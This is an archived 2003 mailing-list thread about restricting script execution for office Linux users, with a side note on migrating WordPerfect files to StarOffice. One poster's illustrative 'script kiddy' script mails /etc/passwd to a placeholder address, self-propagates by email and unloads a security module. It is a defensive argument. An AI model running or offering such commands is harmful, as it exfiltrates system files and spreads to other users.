Loading ...
Sorry, an error occurred while loading the content.
 

Re: [gnubies-il] restricted execution kernel module

Expand Messages
  • meh
    ... I don t know how perl is with proccessing low binary data, no special reason though. ... Secretaries in real offices are usually more like MS office
    Message 1 of 10 , Jan 6, 2003
      Tzafrir Cohen wrote:

      >On Mon, 6 Jan 2003, meh wrote:
      >
      >
      >
      >>Tzafrir Cohen wrote:
      >><snip>
      >>
      >>
      >>
      >>>Linux has powerful interpeters. Simply limiting the exection of kernel
      >>>executables is far from enough:
      >>>
      >>>
      >>>
      >>>
      >>You defenitely have a point - I didn't think of this. Thank you.
      >>A wiser approach is to set a cron job for 'cleaning' secretaries'
      >>group's home dir, by for instance removing any non-document file in
      >>their home dir (check it with a simple C program to match header - no
      >>script can keep an OpenOffice binary header and remain executable, extra
      >>security can be gianed by saving documents in a special dir. name and
      >>append randomly to it a random postfix - keeping it at /var, now script
      >>can't read and recognize dir. name as it doesn't have prmission for this
      >>var file) and reset startup configuration files (lest a script hopped in
      >>it).
      >>This way there's no chance the account will malfunction in future.
      >>
      >>
      >
      >Why write in C when you can write in perl?
      >
      I don't know how perl is with proccessing low binary data, no special
      reason though.

      >Anyway, doing so severly limits the powers of this user. A desktop user
      >with no ability to run an arbitrary shell script from his/her home
      >directory has a problem.
      >
      >Anyway, have a look at "restricted shell" in bash's docs. (again: this is
      >more for a kiosk-type tsystem than for a real office).
      >
      Secretaries in real offices are usually more like "MS office kiosk" as
      those are the only tools they should use. Plus saving ability of course
      but there's no need to make them run scripts.
      <snip>

      >
      >
      >>This is not my fear - I fear users (as in secretaries) will remove their
      >>files accidently. Except one might want to prevent his employees wasting
      >>their time with soliter they brought from home on a diskette :).
      >>
      >>
      >
      >The users should have the power to move and remove their own docuemtns,
      >
      Sure but by hand only - I don't expect secretaries to write bash for
      massive files removing. You must remember they are not "power users" and
      can accidently activate malicious scripts. Restricting script executors'
      access to their files or at least to their documents directory should
      might be considered. Maybe the sollution is to restrict user's file
      handling to specific programs.

      >otherwise they'll have to call the administrator (read: you) for any such
      >change. This will be an administrative nightmare.
      >
      >Eployees should be allowed to access sensetive data (that they need for
      >work). Employees shoukd be allowed to send mail. This has proven to be a
      >nice combination in the past.
      >
      >BTW: One might want to prevent employees to boot with their own
      >floppies/CDs from home, as well.
      >
      >
      >
    • meh
      Tzafrir Cohen wrote: ... Yes but this is more a BIOS feature than an OS feature.
      Message 2 of 10 , Jan 6, 2003
        Tzafrir Cohen wrote:
        <snip>

        >BTW: One might want to prevent employees to boot with their own
        >floppies/CDs from home, as well.
        >
        >
        Yes but this is more a BIOS feature than an OS feature.

        >
        >
      • Tzafrir Cohen
        ... Why write in C when you can write in perl? Anyway, doing so severly limits the powers of this user. A desktop user with no ability to run an arbitrary
        Message 3 of 10 , Jan 7, 2003
          On Mon, 6 Jan 2003, meh wrote:

          > Tzafrir Cohen wrote:
          > <snip>
          >
          > >Linux has powerful interpeters. Simply limiting the exection of kernel
          > >executables is far from enough:
          > >
          > >
          > You defenitely have a point - I didn't think of this. Thank you.
          > A wiser approach is to set a cron job for 'cleaning' secretaries'
          > group's home dir, by for instance removing any non-document file in
          > their home dir (check it with a simple C program to match header - no
          > script can keep an OpenOffice binary header and remain executable, extra
          > security can be gianed by saving documents in a special dir. name and
          > append randomly to it a random postfix - keeping it at /var, now script
          > can't read and recognize dir. name as it doesn't have prmission for this
          > var file) and reset startup configuration files (lest a script hopped in
          > it).
          > This way there's no chance the account will malfunction in future.

          Why write in C when you can write in perl?

          Anyway, doing so severly limits the powers of this user. A desktop user
          with no ability to run an arbitrary shell script from his/her home
          directory has a problem.

          Anyway, have a look at "restricted shell" in bash's docs. (again: this is
          more for a kiosk-type tsystem than for a real office).

          >
          > > /bin/sh script_a_kiddy_will_send_me_by_mail
          > >
          > >$ cat script_a_kiddy_will_send_me_by_mail
          > >mail /etc/passwd script_kiddy@address
          > >for add in <long list of emails>; do mail script_a_kiddy_will_send_me_by_mail $add; done
          > >perl -e 'a script to help me gain root'
          > >rmmod 'limiting module'
          > >
          > >
          > >(this is not a very good script kiddy, so there are nomerous errors, but
          > >you get the point)
          > >
          > >THere are, however, various uses for limiting the powers of root. HAve a
          > >look at the NSA's SELinux, GRSecurity, and a number of other approaches.
          > >
          > This is not my fear - I fear users (as in secretaries) will remove their
          > files accidently. Except one might want to prevent his employees wasting
          > their time with soliter they brought from home on a diskette :).

          The users should have the power to move and remove their own docuemtns,
          otherwise they'll have to call the administrator (read: you) for any such
          change. This will be an administrative nightmare.

          Eployees should be allowed to access sensetive data (that they need for
          work). Employees shoukd be allowed to send mail. This has proven to be a
          nice combination in the past.

          BTW: One might want to prevent employees to boot with their own
          floppies/CDs from home, as well.

          --
          Tzafrir Cohen
          mailto:tzafrir@...
          http://www.technion.ac.il/~tzafrir
        • Bipinchandra Ranpura
          Well just for info. At my workplace we were using DOS (Novell Clients) with WordPerfect5.1 for DOS and Quattro Spreadsheet(wk1 files). Now we are using Linux
          Message 4 of 10 , Jan 7, 2003
            Well just for info. At my workplace we were using DOS
            (Novell Clients) with WordPerfect5.1 for DOS and
            Quattro Spreadsheet(wk1 files). Now we are using Linux
            RedHat 7.3 File Server and Linux RedHat 7.3
            workstations with StarOffice 6.0.

            All Old Quattro files can directly imported in
            StarOffice and saved as Staroffice Spreadsheet.

            All WordPerfect files also imported in with little
            difficulty (1st open under Koffice open Wordperfect
            files -> copy to clipboard (Select all and copy) then
            go to Staroffice Writer and paste.

            Only one problem in importing is if Original file is
            with Password than it can not be opened. 1st you have
            to remove of save file without password then only can
            be imported.

            Sorry to writing so much, which may not of interest to
            all.

            Bipin




            --- meh <meh@...> wrote:
            > Alon Weinstein wrote:
            >
            > >i'm curious -- do secreteries at your workplace use
            > Linux?
            > >
            > >
            > No unfortunately not, I had a dream once to make
            > this happen but reality
            > stroke me real hard. However as Win32 computers
            > keeps breaking and
            > breaking I keep pondering of similar problems can
            > arise with linux and
            > how could they be solved.
            >
            > >
            > >
            > >>You defenitely have a point - I didn't think of
            > this. Thank you.
            > >>A wiser approach is to set a cron job for
            > 'cleaning' secretaries'
            > >>group's home dir,
            > >>
            > >>
            > >
            > >
            > >To unsubscribe from this group, send an email to:
            > >gnubies-il-unsubscribe@egroups.com
            > >
            > >
            > >
            > >Your use of Yahoo! Groups is subject to
            > http://docs.yahoo.com/info/terms/
            > >
            > >
            > >
            > >
            > >
            >
            >
            >
            >


            __________________________________________________
            Do you Yahoo!?
            Yahoo! Mail Plus - Powerful. Affordable. Sign up now.
            http://mailplus.yahoo.com
          Your message has been successfully submitted and would be delivered to recipients shortly.